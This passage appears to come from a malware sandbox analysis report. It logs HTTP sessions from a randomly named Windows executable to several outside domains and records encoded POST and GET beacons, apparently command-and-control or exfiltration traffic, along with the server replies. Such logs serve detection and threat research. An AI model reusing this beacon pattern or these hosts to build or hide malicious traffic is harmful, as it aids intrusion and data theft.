                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 34 4c 52 6b 47 32 51 53 45 57 63 6f 77 64 68 61 64 77 44 6b 41 38 57 30 47 6c 6a 61 79 42 72 45 30 34 6d 4f 6d 63 34 49 48 68 78 48 4a 41 43 73 79 7a 77 33 7a 4c 4b 4f 4a 47 41 6c 62 36 51 77 44 49 61 50 4f 46 56 6e 79 44 47 61 30 6b 4e 45 38 49 70 2b 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Feb 18, 2025 08:15:29.004616976 CET | 579 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmY5YjVhMDYtMDEwMS00MmQ5LWE3MTMtZTIzNWE3OWRhNDEyIiwicGFnZV90aW1lIjoxNzM5ODYyOT


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        5 | 192.168.2.4 | 52532 | 199.59.243.160 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:31.090898037 CET | 570 | OUT | GET /0c5p/?JZfd=ZkUTV7pI9Ap5vIyRRAq5W5SemCe80v7MV0MOYxheQ3+8mZZcGVhaedsyExvQ8P0JBljjtNlykIwC9TSJUDwzYqYInCYcfCsRcBd6++ZWi3nQtc+XigtdVu0=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.travel-cure.sbs
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:15:31.565486908 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:15:30 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 1462
                                                                        X-Request-Id: c8c289de-3374-499e-ba23-56e956172565
                                                                        Cache-Control: no-store, max-age=0
                                                                        Accept-Ch: sec-ch-prefers-color-scheme
                                                                        Critical-Ch: sec-ch-prefers-color-scheme
                                                                        Vary: sec-ch-prefers-color-scheme
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mSVhM3YZSnMhNfayv2+7fCjHcpuRmbtwldyTAiHG2t7zWQS+ChT3TTTEVwRySRC3OUSY+sgRqBANzVlSjksfJw==
                                                                        Set-Cookie: parking_session=c8c289de-3374-499e-ba23-56e956172565; expires=Tue, 18 Feb 2025 07:30:31 GMT; path=/
                                                                        Connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 53 56 68 4d 33 59 5a 53 6e 4d 68 4e 66 61 79 76 32 2b 37 66 43 6a 48 63 70 75 52 6d 62 74 77 6c 64 79 54 41 69 48 47 32 74 37 7a 57 51 53 2b 43 68 54 33 54 54 54 45 56 77 52 79 53 52 43 33 4f 55 53 59 2b 73 67 52 71 42 41 4e 7a 56 6c 53 6a 6b 73 66 4a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mSVhM3YZSnMhNfayv2+7fCjHcpuRmbtwldyTAiHG2t7zWQS+ChT3TTTEVwRySRC3OUSY+sgRqBANzVlSjksfJw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Feb 18, 2025 08:15:31.565531969 CET | 915 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzhjMjg5ZGUtMzM3NC00OTllLWJhMjMtNTZlOTU2MTcyNTY1IiwicGFnZV90aW1lIjoxNzM5ODYyOT


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        6 | 192.168.2.4 | 52568 | 13.248.169.48 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:36.608201027 CET | 840 | OUT | POST /ajxq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.physicsbrain.xyz
                                                                        Origin: http://www.physicsbrain.xyz
                                                                        Referer: http://www.physicsbrain.xyz/ajxq/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 32 61 74 41 51 65 59 38 71 56 46 42 78 4f 47 7a 7a 65 75 46 79 63 4f 52 4c 67 42 4d 62 63 79 78 78 66 70 4b 4b 2b 79 2f 56 6f 73 31 35 4a 61 67 49 75 46 69 77 71 49 38 64 6c 53 50 30 50 30 2f 39 62 48 6b 32 2b 6e 69 33 42 47 62 42 38 62 65 48 59 33 50 6c 4f 47 66 31 71 4d 64 2b 37 38 78 6d 70 61 68 59 66 5a 53 4c 4a 5a 4a 55 4a 56 36 67 61 4a 2f 6f 61 2f 41 68 64 44 68 43 6e 45 4f 4b 57 6f 45 6e 68 7a 6a 2b 32 72 78 35 64 46 78 67 36 65 67 50 42 68 57 5a 78 59 6c 49 73 30 39 76 31 55 4b 62 73 63 4a 59 62 58 6c 6e 50 2b 2f 62 49 44 55 6e 6b 62 77 48 30 73 4e 46 43 43 33 77 3d 3d
                                                                        Data Ascii: JZfd=U2atAQeY8qVFBxOGzzeuFycORLgBMbcyxxfpKK+y/Vos15JagIuFiwqI8dlSP0P0/9bHk2+ni3BGbB8beHY3PlOGf1qMd+78xmpahYfZSLJZJUJV6gaJ/oa/AhdDhCnEOKWoEnhzj+2rx5dFxg6egPBhWZxYlIs09v1UKbscJYbXlnP+/bIDUnkbwH0sNFCC3w==
                                                                        Feb 18, 2025 08:15:37.053355932 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        7 | 192.168.2.4 | 52584 | 13.248.169.48 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:39.254173994 CET | 860 | OUT | POST /ajxq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.physicsbrain.xyz
                                                                        Origin: http://www.physicsbrain.xyz
                                                                        Referer: http://www.physicsbrain.xyz/ajxq/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 32 61 74 41 51 65 59 38 71 56 46 41 51 2b 47 6f 54 69 75 51 43 63 42 55 4c 67 42 56 4c 63 32 78 78 54 70 4b 4c 37 71 2f 68 45 73 79 62 52 61 79 64 43 46 68 77 71 49 6f 74 6b 57 43 55 50 42 2f 39 48 35 6b 7a 47 6e 69 33 56 47 62 44 30 62 65 32 59 32 4a 31 4f 45 58 56 71 4f 58 65 37 38 78 6d 70 61 68 59 62 2f 53 49 35 5a 4a 67 4e 56 31 68 61 4b 33 49 61 38 44 68 64 44 6c 43 6e 41 4f 4b 57 4f 45 69 41 55 6a 34 36 72 78 38 78 46 78 31 61 5a 35 66 42 6a 62 35 78 4c 69 72 59 35 7a 4e 6f 44 55 34 77 6a 43 35 53 79 6b 68 43 6b 75 71 70 55 47 6e 41 6f 74 41 39 59 41 47 2f 4c 73 77 4a 48 66 43 41 6c 47 42 57 78 61 44 63 41 43 43 35 56 50 79 4d 3d
                                                                        Data Ascii: JZfd=U2atAQeY8qVFAQ+GoTiuQCcBULgBVLc2xxTpKL7q/hEsybRaydCFhwqIotkWCUPB/9H5kzGni3VGbD0be2Y2J1OEXVqOXe78xmpahYb/SI5ZJgNV1haK3Ia8DhdDlCnAOKWOEiAUj46rx8xFx1aZ5fBjb5xLirY5zNoDU4wjC5SykhCkuqpUGnAotA9YAG/LswJHfCAlGBWxaDcACC5VPyM=
                                                                        Feb 18, 2025 08:15:39.727627039 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        8 | 192.168.2.4 | 52600 | 13.248.169.48 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:41.802930117 CET | 10942 | OUT | POST /ajxq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.physicsbrain.xyz
                                                                        Origin: http://www.physicsbrain.xyz
                                                                        Referer: http://www.physicsbrain.xyz/ajxq/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 32 61 74 41 51 65 59 38 71 56 46 41 51 2b 47 6f 54 69 75 51 43 63 42 55 4c 67 42 56 4c 63 32 78 78 54 70 4b 4c 37 71 2f 68 4d 73 79 75 46 61 67 75 36 46 67 77 71 49 30 39 6b 56 43 55 50 6d 2f 39 4f 2b 6b 7a 43 33 69 30 74 47 61 67 73 62 4f 43 4d 32 41 31 4f 45 56 56 71 4e 64 2b 36 32 78 69 46 65 68 59 4c 2f 53 49 35 5a 4a 6d 68 56 78 77 61 4b 36 6f 61 2f 41 68 64 50 68 43 6d 66 4f 4b 75 77 45 69 4e 6a 67 49 61 72 78 63 68 46 2b 6d 79 5a 6d 50 42 74 49 4a 77 57 69 72 46 35 7a 4e 6b 50 55 37 73 4a 43 35 57 79 6b 45 66 6e 79 4a 56 32 63 58 55 36 36 69 77 36 4e 45 54 4d 33 6a 64 44 61 79 30 4c 63 54 62 61 51 41 31 52 5a 53 68 68 53 69 37 4b 49 39 63 56 42 35 70 63 79 4b 7a 57 43 6d 79 30 37 75 67 75 37 57 31 39 31 48 39 65 36 72 54 55 79 4d 51 30 50 6c 48 6a 77 30 73 41 43 6d 49 47 51 70 58 62 53 47 2f 4b 6b 58 4d 48 41 37 31 6d 33 71 42 35 41 30 76 53 5a 72 30 36 63 57 54 57 69 69 47 49 53 6b 46 74 55 4d 69 57 48 74 74 4f 68 6a 72 6a 65 43 34 49 6e 70 2f 47 71 51 4e 52 47 77 6c 42 55 [TRUNCATED]
                                                                        Data Ascii: JZfd= [TRUNCATED]
                                                                        Feb 18, 2025 08:15:42.251498938 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        9 | 192.168.2.4 | 52619 | 13.248.169.48 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:44.341515064 CET | 571 | OUT | GET /ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.physicsbrain.xyz
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:15:44.792871952 CET | 377 | IN | HTTP/1.1 200 OK
                                                                        content-type: text/html
                                                                        date: Tue, 18 Feb 2025 07:15:44 GMT
                                                                        content-length: 256
                                                                        connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 5a 66 64 3d 5a 30 79 4e 44 6e 4b 35 33 4a 67 74 4d 53 4c 74 2f 51 2b 64 53 7a 30 48 57 71 77 6b 4e 75 6f 70 30 41 4c 35 4c 72 62 39 35 54 59 65 7a 5a 63 43 6b 2b 47 42 6a 6a 43 32 72 4f 35 41 50 33 6e 61 38 4f 54 50 6a 6a 32 63 79 55 52 77 4e 6a 30 55 65 6e 70 35 48 6a 76 35 53 58 72 74 59 4b 32 42 6d 47 77 45 70 59 58 76 57 70 68 69 58 58 31 36 31 53 71 54 76 59 77 3d 26 32 38 74 3d 5f 44 6c 48 39 46 4e 70 4a 62 75 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu"}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        10 | 192.168.2.4 | 52656 | 162.0.231.203 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:49.852987051 CET | 834 | OUT | POST /rvdc/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.infiniteve.xyz
                                                                        Origin: http://www.infiniteve.xyz
                                                                        Referer: http://www.infiniteve.xyz/rvdc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 31 51 36 59 37 70 69 47 6e 42 6c 69 4f 39 41 66 65 79 59 49 42 57 41 74 55 4a 34 61 46 4e 4f 5a 77 79 36 55 50 71 49 61 5a 4c 47 72 2b 65 31 37 2f 69 46 6d 6e 74 6f 72 39 57 57 55 65 73 37 43 64 66 4d 58 54 50 37 69 73 31 68 36 48 6f 6e 78 66 6c 48 75 50 34 30 64 4a 2f 2f 4f 41 4b 57 41 67 6f 4e 54 48 39 77 71 6c 44 62 76 2f 4b 76 41 4e 4f 43 6d 71 37 6f 57 52 6c 75 68 31 36 62 68 58 30 79 46 71 31 51 43 51 52 77 47 6a 47 54 53 49 30 39 5a 74 68 79 54 6a 4c 42 50 4b 53 7a 52 6b 6c 30 32 68 5a 34 62 35 71 71 4d 6a 34 43 48 6b 53 72 46 4a 74 47 6a 59 4f 2b 49 5a 68 31 50 4c 67 3d 3d
                                                                        Data Ascii: JZfd=1Q6Y7piGnBliO9AfeyYIBWAtUJ4aFNOZwy6UPqIaZLGr+e17/iFmntor9WWUes7CdfMXTP7is1h6HonxflHuP40dJ//OAKWAgoNTH9wqlDbv/KvANOCmq7oWRluh16bhX0yFq1QCQRwGjGTSI09ZthyTjLBPKSzRkl02hZ4b5qqMj4CHkSrFJtGjYO+IZh1PLg==
                                                                        Feb 18, 2025 08:15:50.452797890 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:50 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.2.4 | 52657 | 162.0.231.203 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:52.394565105 CET | 854 | OUT | POST /rvdc/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.infiniteve.xyz
                                                                        Origin: http://www.infiniteve.xyz
                                                                        Referer: http://www.infiniteve.xyz/rvdc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 31 51 36 59 37 70 69 47 6e 42 6c 69 4e 64 51 66 62 56 30 49 56 47 41 75 62 70 34 61 50 74 50 65 77 79 6d 55 50 72 4d 73 65 35 53 72 35 2b 6c 37 6c 6e 70 6d 33 39 6f 72 6c 6d 57 72 61 73 37 64 64 66 49 78 54 4c 37 69 73 31 46 36 48 70 58 78 63 57 76 76 4e 6f 30 62 50 2f 2f 32 45 4b 57 41 67 6f 4e 54 48 39 6b 45 6c 44 7a 76 2f 36 2f 41 43 50 43 6c 30 4c 6f 58 53 6c 75 68 6a 4b 62 6c 58 30 79 37 71 78 52 58 51 55 30 47 6a 48 6a 53 49 46 39 61 6e 68 79 76 6e 4c 41 72 61 67 57 66 71 6b 52 47 6f 4a 77 33 2f 37 58 74 76 65 50 64 31 6a 4b 53 62 74 69 51 46 4a 33 38 55 69 49 47 51 73 4d 4d 48 58 2f 63 47 63 45 65 58 52 38 39 53 35 51 67 32 77 6b 3d
                                                                        Data Ascii: JZfd=1Q6Y7piGnBliNdQfbV0IVGAubp4aPtPewymUPrMse5Sr5+l7lnpm39orlmWras7ddfIxTL7is1F6HpXxcWvvNo0bP//2EKWAgoNTH9kElDzv/6/ACPCl0LoXSluhjKblX0y7qxRXQU0GjHjSIF9anhyvnLAragWfqkRGoJw3/7XtvePd1jKSbtiQFJ38UiIGQsMMHX/cGcEeXR89S5Qg2wk=
                                                                        Feb 18, 2025 08:15:52.974826097 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:52 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
